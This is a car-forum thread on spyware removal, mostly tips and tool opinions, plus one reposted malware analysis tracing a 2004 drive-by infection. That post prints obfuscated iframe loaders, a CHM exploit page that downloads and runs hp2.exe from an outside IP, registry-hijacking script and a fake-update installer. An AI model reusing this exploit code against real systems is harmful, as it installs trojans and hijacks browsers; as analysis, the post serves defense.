Beyond.ca

Registration is free! Car Forums - Member Rides Car Forums - Find other members Car Forums - Calendar Car Forums - Frequently Asked Questions Forum Rules and Regulations Car Forums - Search Logout
Beyond.ca - Car Forums : Powered by vBulletin version 2.3.9 Beyond.ca - Car Forums > Lounge > Computers, Consoles, and other Electronics > Spyware Removal And Prevention Guide!!!


Author
Thread
GingeRRRBeef
[3/3] : LaQuessha

Location: Calgary
What I drive: 2016 VW MK7 R ORYX DSG TECH
Posts/Day: 0.16
Trader Rating: (1)
User Rating: 100%


Exclamation Spyware Removal And Prevention Guide!!! Updated 6/18 quote:

Updated 6-16-2004
Spyware Removal And Prevention Guide!!!
So the big question, what exactly is Spyware?: Spyware is a cookie or program installed onto your system by other programs or from a website without you knowledge and without your permission.
The spyware then "watches" you while you surf the web, and in some cases will monitor you sending e-mail or playing games. The spyware then sends back this information to the author/source which can sometimes be personal or sensitive data - otherwise known as "calling home". You will usually receive pop-ups advertising Internet security or the very much needed “Pop-up blocker", some of the worse spyware has been documented to steal your most personal information from your computer such as credit card numbers and social security numbers.

Where this spyware comes from isn't always the easiest to find out. Some of the most common spyware comes from “Gator,” “Comet Cursor” and “Hotbar”. Most free programs that proclaim to let you freely change to new screen savers and other uses are not really free. They contain spyware to watch your surfing habits, log information and advertise to you. Now before you start to panic, bear in mind that not all free programs contain spyware..
For the rest of the guide: GO HERE!



Updated 6-17-2004
Spyware Removal Tools Compared
With spyware on the rise we wanted to see which spyware/adware removal tool worked best under an infected machine. We placed 5 spyware/adware scanning and removing applications head-to-head to see which one gave the best results as far as finding the most infected objects. Read the full article @ Flexbeta.net



Updated 6-18-2004
Why You Should Dump Internet Explorer
Interesting read on how an MCSE (MS Certified Software Engineer) comments on how bad IE really is...
Are you still using IE?



Updated 6-18-2004
Ten Steps to a Secure PC
PCStats have thrown up a new beginners guide to securing your PC againist viruses, Trojan horses and more! Here's a snip.

With this guide, PCstats has set out to inform you clearly and concisely of the dangers you face, and the steps you can take to avoid them. Once you look through, I think you'll be struck by how little effort is required to make your PC more secure. Even performing the first five steps of this guide will make your system better protected than the vast majority of Internet connected PCs. It is not wise to rely on the comparative anonymity of the Internet to keep you safe. If you do, you will be burned eventually and inevitably. Secure your PC now to avoid future regrets.
For the rest of the guide: GO HERE!

Updated 8-31-2004
Rogue/Suspect Anti-Spyware Products & Web Sites

__________________
"Sic Parvis Magna"
FKA Silver_SpecV

Last edited by GingeRRRBeef on 08-31-2004 at 10:31 PM

Report this post | IP: Logged

Old Post 04-27-2004 03:56 AM
GingeRRRBeef is offline Click Here to See the Profile for GingeRRRBeef Click here to Send GingeRRRBeef a Private Message Visit GingeRRRBeef's homepage! Find more posts by GingeRRRBeef Edit/Delete Message Reply w/Quote
 
D'z Nutz
Super Moderator

Location: Calgary, Alberta
What I drive: Southerners out of the North
Posts/Day: 0.99
Trader Rating: (122)
User Rating: 111%


quote:

Good idea. We get spyware related posts atleast once a week here (seriously).

__________________
FS: Icon Anthem 2 Mesh Mens Motorcycle Jacket

Report this post | IP: Logged

Old Post 04-27-2004 04:20 AM
D'z Nutz is offline Click Here to See the Profile for D'z Nutz Click here to Send D'z Nutz a Private Message Visit D'z Nutz's homepage! Find more posts by D'z Nutz Edit/Delete Message Reply w/Quote
hjr
Third Gear

Location: T2S
What I drive: pedals
Posts/Day: 0.61
Trader Rating: (5)
User Rating: 100%


quote:

good post man.

Report this post | IP: Logged

Old Post 04-28-2004 01:15 AM
hjr is offline Click Here to See the Profile for hjr Click here to Send hjr a Private Message Find more posts by hjr Edit/Delete Message Reply w/Quote
GingeRRRBeef
[3/3] : LaQuessha

Location: Calgary
What I drive: 2016 VW MK7 R ORYX DSG TECH
Posts/Day: 0.16
Trader Rating: (1)
User Rating: 100%


quote:

New Spyware article on www.wired.com


"My first question, when something goes wrong on a computer or the network, is: What did you do right before the problem started? Ninety-nine percent of all computer problems are caused by what people did to their computers. But 99 percent of the people, 99 percent of the time, will insist that they did absolutely nothing odd or unusual before the computer died," said John Vitelle, a Chicago-based systems administrator.




"No one installs it, yet this garbage is on so many machines. Obviously the spyware fairy shows up late at night and installs the junk on their systems," said Keith Hitchens, who maintains networks for several clients, including a Manhattan public relations firm and a magazine-publishing business.

__________________
"Sic Parvis Magna"
FKA Silver_SpecV

Last edited by GingeRRRBeef on 04-29-2004 at 01:13 AM

Report this post | IP: Logged

Old Post 04-29-2004 01:05 AM
GingeRRRBeef is offline Click Here to See the Profile for GingeRRRBeef Click here to Send GingeRRRBeef a Private Message Visit GingeRRRBeef's homepage! Find more posts by GingeRRRBeef Edit/Delete Message Reply w/Quote
Gonthro
Banned - rage2's abuse at it's finest

Location: I'm somewhere where I don't know where I am...
What I drive: That Blue Car
Posts/Day: 0.22
Trader Rating: (6)
User Rating: 100%


quote:

spyware sucks, i ran 3 diffrent spyware programs last week and every one right after another picked up atleast 3-4 other spyware progs that the previous on missed, i used adaware 6, spybot, and free-av

it sawks

they should just start charging nayone that advertises with spyware companies, that wa they wont get any busines nad will eventually go away.

__________________

Originally posted by ZorroAMG
LESSON: Don't be a giant dickface to people if you can't deal with retaliation.

Report this post | IP: Logged

Old Post 06-17-2004 08:37 PM
Gonthro is offline Click Here to See the Profile for Gonthro Click here to Send Gonthro a Private Message Visit Gonthro's homepage! Find more posts by Gonthro Edit/Delete Message Reply w/Quote
GingeRRRBeef
[3/3] : LaQuessha

Location: Calgary
What I drive: 2016 VW MK7 R ORYX DSG TECH
Posts/Day: 0.16
Trader Rating: (1)
User Rating: 100%


quote:

updates!!!

__________________
"Sic Parvis Magna"
FKA Silver_SpecV

Report this post | IP: Logged

Old Post 06-18-2004 07:15 PM
GingeRRRBeef is offline Click Here to See the Profile for GingeRRRBeef Click here to Send GingeRRRBeef a Private Message Visit GingeRRRBeef's homepage! Find more posts by GingeRRRBeef Edit/Delete Message Reply w/Quote
ricosuave
Second Gear

Location: Calgary, Alberta, Canada, North America, Earth, The Milky Way . . .
What I drive:
Posts/Day: 0.37
Trader Rating: (283)
User Rating: 100%


quote:

http://forums.anandtech.com/message...eyword1=spyware

Report this post | IP: Logged

Old Post 07-07-2004 08:16 AM
ricosuave is offline Click Here to See the Profile for ricosuave Click here to Send ricosuave a Private Message Visit ricosuave's homepage! Find more posts by ricosuave Edit/Delete Message Reply w/Quote
Kobe
Second Gear

Location: Calgary
What I drive: Eclipse
Posts/Day: 0.34
Trader Rating: (28)
User Rating: 97%


quote:

NEED A FREE PROGRAM TO DELETE SOME SPYWARE

AHHHH im infested hahaha

__________________

Originally posted by beemerm3
so if we only seen 5 % of the oceans why not drain them or somethin lol or can u even transfer water from one ocean to another??? think of all the stuff u'd find treasures n eerything.

Report this post | IP: Logged

Old Post 07-26-2004 02:36 AM
Kobe is offline Click Here to See the Profile for Kobe Click here to Send Kobe a Private Message Find more posts by Kobe Edit/Delete Message Reply w/Quote
googe
Banned

Location: Seattle, WA
What I drive:
Posts/Day: 0.39
Trader Rating: (7)
User Rating: 97%


quote:

eye opening article...


Follow the Bouncing Malware - Part I

On July 20th, after investigating some adware/spyware/malware that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMWare image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry.

Today's diary entry represents the first part of my analysis of what happened when I "forgot to use protection" on the Internet. In part II, I'll examine the full extent of the damage that my poor "Joe Average" would have received, and perhaps add a little "editorializing" to my findings.

To give you a little "preview", I'll say this: I discovered that as far as the adware/spyware industry is concerned, you may be the one that plunked down a grand at your local consumer electronics store to purchase your PC, but THEY own it. They'll do whatever they want, whenever they want, and you don't get a say in the matter. The utter "ballsy-ness" of what they do will astonish you, and I hope reading this might make some of the people enabling this sort of activity to wake up and take action.

Obviously, what happened in my little experiment would be a result of where I decided to go on the net. To be perfectly fair, the sites that will be mentioned in this essay are only a cross-section of the evil that is waiting out there on the net - they're probably no better, or worse than any of the other adware/spyware ilk. My choice of a "starting point" was based on the incident that I had just investigated.

In deciding to be "Joe Average", I tried to replicate (as well as possible) the machine that I had just investigated. That machine had IE6.0 with the Google Toolbar installed with the popup blocker active. Please keep this setup in mind as I "follow the bouncing malware."

Also, something to keep in mind: I'm not going to set up any of the URLs in this tale so that they act as hyperlinks. This is done on purpose. DO NOT FOLLOW THE PATH I'M DESCRIBING HERE, ESPECIALLY IF YOU ARE RUNNING AN UNPATCHED MACHINE. THIS MEANS YOU. REALLY.

After installing the Google Toolbar, I did exactly what my "Joe Average" had done to get his machine compromised: Googled. Someone had told him about "Yahoo Games", and well, he wanted to check it out. I put "Yahoo games" into Google and then (for whatever reason... hey, it's what my "Joe Average" did) skipped several obvious links leading to Yahoo! and clicked instead on "www.yahoogamez.com" (NOTE: If you're running an unpatched machine, DO NOT GO THERE).

yahoogamez.com is a website that contains links to many different online games, and while I have no idea if their games are any good, their advertisements are certainly interesting. Like many websites which offer online games, the idea here is to get people to visit the site and generate revenue based on advertising that appears on the site and provides an income based on both the number of times an ad is displayed ("impressions") and, especially, on any "click through" traffic. Generally, the site owner contracts with another company that acts as a "go-between", selling "placement" to advertisers, and contracting with sites to display ads. Many of these online advertising companys then provide servers that, on a rotating basis, dole out the code and images for ads to participating websites.

In two instances on the yahoogamez.com site, there are ads provided by "aim4media.com". Going to the yahoogames website results in a flurry of HTTP activity, including the following

[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

Which results in the following HTML:

-----------------------------------------------------------------------------------------------------------

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent'>
<iframe src="http://205.236.189.58/mynet/mynet-MML.html" width=468 height=60 hspace=0 vspace=0
frameborder=0 marginheight=0 marginwidth=0 scrolling=no> <a href="http://205.236.189.58/mynet/mynet-MML.html"
target="_blank"><img width=468 height=60 src="http://205.236.189.58/mynet/mynet-MML.html" border=0></a></iframe>
<div id="beacon_459" style="position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='http://adserver.aim4media.com/adlog.php?bannerid=459&clientid=431&zoneid=450&source=&
block=86400&capping=3&cb=7da741942b0623acd85070683ffa3ad8' width='0' height='0' alt='' style='width: 0px;
height: 0px;'></div>
</body>
</html>


-----------------------------------------------------------------------------------------------------------

This results in the following HTTP GET:
[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
And the following HTML gets downloaded:

<a href="http://www.lovemynet.com/?frombanner2" target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>


-----------------------------------------------------------------------------------------------------------

Looks like someone is trying to hide something... This decodes to:

<iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>


-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"

Which gives us:
-----------------------------------------------------------------------------------------------------------

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>


-----------------------------------------------------------------------------------------------------------

Which decodes to:

<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm"
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
</script>


-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"

Within this chm exploit, we find the following hp2.htm file:

-----------------------------------------------------------------------------------------------------------

<script language="vbscript">
Function Exists(filename)
On Error Resume Next
LoadPicture(filename)
Exists = Err.Number = 481
End Function
</script>
<script language="javascript">
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML =
"<object data=http://209.50.251.182/vu083003/object-c002.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
wmplayerpaths= [
"C:\\Programmer\\Windows Media Player\\wmplayer.exe",
"C:\\Program\\Windows Media Player\\wmplayer.exe",
"C:\\Programme\\Windows Media Player\\wmplayer.exe",
"C:\\Programmi\\Windows Media Player\\wmplayer.exe",
"C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
"C:\\Programas\\Windows Media Player\\wmplayer.exe",
"C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
"C:\\Program Files\\Windows Media Player\\wmplayer.exe"
];
for (i=0;i<wmplayerpaths.length;i++) {
wmplayerpath = wmplayerpaths[i];
if (Exists(wmplayerpath))
break;
}
function getPath(url) {
start = url.indexOf('http:')
end = url.indexOf('HP2.CHM')
return url.substring(start, end);
}
payloadURL = getPath(location.href)+'hp2.exe';
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(wmplayerpath,2);
var win=null;
function NewWindow(mypage,myname,w,h,scroll,pos){
if(pos=="random"){
LeftPosition=(screen.width)?Math.floor(Math.random()*(screen.width-w)):100;
TopPosition=(screen.height)?Math.floor(Math.random()*((screen.height-h)-75)):100;
}
if(pos=="center"){
LeftPosition=(screen.width)?(screen.width-w)/2:100;
TopPosition=(screen.height)?(screen.height-h)/2:100;
}
else if((pos!="center" && pos!="random") || pos==null){
LeftPosition=0;TopPosition=20
}
settings='width='+w+',height='+h+',top='
+TopPosition+',left='+LeftPosition
+',scrollbars='+scroll
+',location=no,directories=no,status=no,menubar=no,toolbar=no,resizable=no';
win=window.open(mypage,myname,settings);
}
location.href = "mms://";
</script>


-----------------------------------------------------------------------------------------------------------

Following along...
[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"

-----------------------------------------------------------------------------------------------------------

<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hklm");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
</script>
<script language=javascript>
self.close()
</script>
</html>


-----------------------------------------------------------------------------------------------------------

Well, our home page just got changed, as did our default search engine... Nice, real nice. But that's not all... there was a file called "hp2.exe" that was downloaded and executed by our .chm exploit. Sure enough, looking at my logs, I found:

[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"

hp2.exe is what is known as a "dropper" program. That is, it is actually a small "stub" program with another (sometimes more than one) program attached to it as "data". When the program executes, it writes out the "data" to a file and then executes the resulting program. hp2.exe drops a UPX packed executable that, when executed, will contact www.totalvelocity.com/Bundling/tvmupdater4bp5.exe, which installs/updates the "TV Media Display" spyware.

At this point, I followed one link on the site, that required I have Flash installed. Since I didn't have Flash installed, I went "back". But because I now had cookies placed on my computer from my original visit to the site, one of yahoogamez' files, popup.js, does something differently:

Now, this code within popup.js is executed:

-----------------------------------------------------------------------------------------------------------

if ((document.cookie.indexOf("popuptraffic") != -1 ) && (document.cookie.indexOf("popupsponsor") == -1)){
var expdate = new Date((new Date()).getTime() + 1800000);
document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";
document.write("<script language=\"JavaScript\"
src=\"http://addictivetechnologies.net/dm0/js/Confirmfr03tp.js\"></script>");
}


-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"

-----------------------------------------------------------------------------------------------------------

var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
var retry_enabled = true;
var retry_cnt=1;
document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
function retry() {
if(retry_cnt>0) {
alert("To install latest AT- Games update, please click Yes");
start_download();
retry_cnt--;
} else {
//alert("This is a 1 time install, once you click Open it will never pop up this message again");
//downloads_manager.window.location = "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
}
}
function start_download()
{
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
if ( navigator.platform && navigator.platform != 'Win32' ){
//alert("Sorry, your browser is not WIN32 Compatible");
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2){
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab"
HEIGHT=0 WIDTH=0></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
}
else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
//trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
start_download();


-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"

This cab file contains two files:

ATPartners.inf - 403 bytes
ATPartnets.dll - 96,256 bytes

The .dll file is identified by AV software as Win32/TrojanDownloader.Rameh.C trojan

And that's were I'm going to end it for today. In the next part, I'll take a look at what happens as this chain of malware continues on it's merry way, and I'll also investigate what happens when I fire up IE the next time and visit my new home page.

Last edited by googe on 09-30-2004 at 09:17 AM

Report this post | IP: Logged

Old Post 07-26-2004 02:53 AM
googe is offline Click Here to See the Profile for googe Click here to Send googe a Private Message Find more posts by googe Edit/Delete Message Reply w/Quote
GingeRRRBeef
[3/3] : LaQuessha

Location: Calgary
What I drive: 2016 VW MK7 R ORYX DSG TECH
Posts/Day: 0.16
Trader Rating: (1)
User Rating: 100%


quote:

Updates!!!

Updated 8-31-2004
Rogue/Suspect Anti-Spyware Products & Web Sites

__________________
"Sic Parvis Magna"
FKA Silver_SpecV

Report this post | IP: Logged

Old Post 08-31-2004 10:31 PM
GingeRRRBeef is offline Click Here to See the Profile for GingeRRRBeef Click here to Send GingeRRRBeef a Private Message Visit GingeRRRBeef's homepage! Find more posts by GingeRRRBeef Edit/Delete Message Reply w/Quote
civic_stylez
Second Gear

Location: the titty bar...
What I drive: starts with a screwdriver...
Posts/Day: 0.23
Trader Rating: (8)
User Rating: 100%


quote:

thanks alot for the post, my computer was totally full of crap! that new firefox has helped alot too. thanks again!

__________________
I MAKE BALLER CARS MORE BALLER.....

Report this post | IP: Logged

Old Post 01-09-2005 10:53 PM
civic_stylez is offline Click Here to See the Profile for civic_stylez Click here to Send civic_stylez a Private Message Find more posts by civic_stylez Edit/Delete Message Reply w/Quote
ricosuave
Second Gear

Location: Calgary, Alberta, Canada, North America, Earth, The Milky Way . . .
What I drive:
Posts/Day: 0.37
Trader Rating: (283)
User Rating: 100%


quote:

http://www.microsoft.com/downloads/...mp;Hash=JFJYHY7

Report this post | IP: Logged

Old Post 01-10-2005 12:04 AM
ricosuave is offline Click Here to See the Profile for ricosuave Click here to Send ricosuave a Private Message Visit ricosuave's homepage! Find more posts by ricosuave Edit/Delete Message Reply w/Quote
dragonone
First Gear

Location: Vancouver
What I drive:
Posts/Day: 0.22
Trader Rating: (44)
User Rating: 98%


quote:

i use norton 05 and opera
i only use IE rarely and only for emails or sites that require specific plug-ins

so far for most ppl that followed this roughly they have no problems

I guess you have to be careful when you visit sites
ie. finding a crack on astalavista, usually when you find one and there's a 'download' button and you click on it on IE (w/o antivirus etc) you're bound to get the spyware/virus. when you use opera and norton to click it, opera first asks you if you wan to d/l the xxx.exe generic spyware file-something like sexphone.exe, than norton blocks the virus exploit

just a thought >.<

__________________
flickr

Report this post | IP: Logged

Old Post 03-01-2005 12:12 PM
dragonone is offline Click Here to See the Profile for dragonone Click here to Send dragonone a Private Message Find more posts by dragonone Edit/Delete Message Reply w/Quote
/////AMG
FKA: Porsche_944

Location: Nottingham, UK
What I drive: VW Scirocco GT
Posts/Day: 0.42
Trader Rating: (9)
User Rating: 100%


quote:

So does firefox!

Report this post | IP: Logged

Old Post 03-01-2005 01:28 PM
/////AMG is offline Click Here to See the Profile for /////AMG Click here to Send /////AMG a Private Message Visit /////AMG's homepage! Find more posts by /////AMG Edit/Delete Message Reply w/Quote
pantharen
Newbie

Location: latitude 49 16 N, longitude 123 07 W
What I drive: 1988 Suzuki Forsa VGA
Posts/Day: 0.00
Trader Rating: (0)
User Rating: 100%


quote:



This download is available to customers running genuine Microsoft Windows. Please click Continue to begin Windows validation.



Not all of us run legit copies of XP, personally I do like my copy of Corp XP.

However, my laptop has XP Home, and I also use Firefox.

__________________

Report this post | IP: Logged

Old Post 03-27-2005 06:46 PM
pantharen is offline Click Here to See the Profile for pantharen Click here to Send pantharen a Private Message Visit pantharen's homepage! Find more posts by pantharen Edit/Delete Message Reply w/Quote
legendboy
AMG Killer

Location: Calgary
What I drive: 6.7 CUMMINS
Posts/Day: 0.84
Trader Rating: (28)
User Rating: 100%


quote:



i personally use this, it has very good functionality, especially real time protection

__________________
Machining, Fabricating, Welding

https:[email protected]

Report this post | IP: Logged

Old Post 03-27-2005 07:16 PM
legendboy is offline Click Here to See the Profile for legendboy Click here to Send legendboy a Private Message Find more posts by legendboy Edit/Delete Message Reply w/Quote
pantharen
Newbie

Location: latitude 49 16 N, longitude 123 07 W
What I drive: 1988 Suzuki Forsa VGA
Posts/Day: 0.00
Trader Rating: (0)
User Rating: 100%


quote:

Originally posted by legendboy


i personally use this, it has very good functionality, especially real time protection



Only thing I dont like about Giant anti-Spy (Yes I know it's beta) is it crashes my computer randomly.

I've had some serious issues with it on both Pro & Home. Being that it's now a M$ product, they're not going to do much about it.

__________________

Report this post | IP: Logged

Old Post 03-27-2005 07:31 PM
pantharen is offline Click Here to See the Profile for pantharen Click here to Send pantharen a Private Message Visit pantharen's homepage! Find more posts by pantharen Edit/Delete Message Reply w/Quote
roopi
Second Gear

Location: Calgary, AB
What I drive:
Posts/Day: 0.31
Trader Rating: (49)
User Rating: 237%


quote:

Originally posted by pantharen



Not all of us run legit copies of XP, personally I do like my copy of Corp XP.

However, my laptop has XP Home, and I also use Firefox.




You don't need to have a legit copy of XP to download this. The second step lets you skip the verification process.

I've found the MS Spyware Checker to be the best.

Report this post | IP: Logged

Old Post 03-27-2005 08:25 PM
roopi is offline Click Here to See the Profile for roopi Click here to Send roopi a Private Message Find more posts by roopi Edit/Delete Message Reply w/Quote
pantharen
Newbie

Location: latitude 49 16 N, longitude 123 07 W
What I drive: 1988 Suzuki Forsa VGA
Posts/Day: 0.00
Trader Rating: (0)
User Rating: 100%


quote:

Originally posted by roopi



You don't need to have a legit copy of XP to download this. The second step lets you skip the verification process.

I've found the MS Spyware Checker to be the best.



Ahhh then they have changed it, I downloaded days after M$ bought Giant, and they wouldn't allow my "copy" of XP to download it, they wanted me to contact M$.

__________________

Report this post | IP: Logged

Old Post 03-27-2005 08:40 PM
pantharen is offline Click Here to See the Profile for pantharen Click here to Send pantharen a Private Message Visit pantharen's homepage! Find more posts by pantharen Edit/Delete Message Reply w/Quote
Magic
Newbie

Location: Calgary
What I drive: 1996 Plymoth Voyager SE
Posts/Day: 0.02
Trader Rating: (3)
User Rating: 100%


quote:

Originally posted by pantharen


Only thing I dont like about Giant anti-Spy (Yes I know it's beta) is it crashes my computer randomly.

I've had some serious issues with it on both Pro & Home. Being that it's now a M$ product, they're not going to do much about it.



Actually as of today, you need to have a Geniune copy of Windows XP (or a geniune CORP key) to use windows update or download most microsoft applications. Skipping or "disabling" the verification plugin wont do shit, you will only get access to "some "critical updates and not all of them. Automatic Updates will still work but will again only download a few critial updates.

Report this post | IP: Logged

Old Post 07-28-2005 08:09 AM
Magic is offline Click Here to See the Profile for Magic Click here to Send Magic a Private Message Visit Magic's homepage! Find more posts by Magic Edit/Delete Message Reply w/Quote
The time now is 07:55 AM (GMT) Post New Thread   
 
Last Thread   Next Thread
Beyond.ca - Car Forums : Powered by vBulletin version 2.3.9 Beyond.ca - Car Forums > Lounge > Computers, Consoles, and other Electronics > Spyware Removal And Prevention Guide!!!



Show Printable Version | Email this Page | Subscribe to this Thread


Forum Rules:
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is OFF
vB code is ON
Smilies are ON
[IMG] code is ON
 

Google
 
Web beyond.ca

Terms of Use - Contact Us - Advertising Info - Archives - Car Blog

Powered by: vBulletin Version 2.3.9
Copyright ©2009 Jelsoft Enterprises Limited.

Bringing Car Enthusiasts together in discussion on our car forums

Page Statistics : Page generated in 0.09365797 seconds (72.52% PHP - 27.48% MySQL) with 41 queries.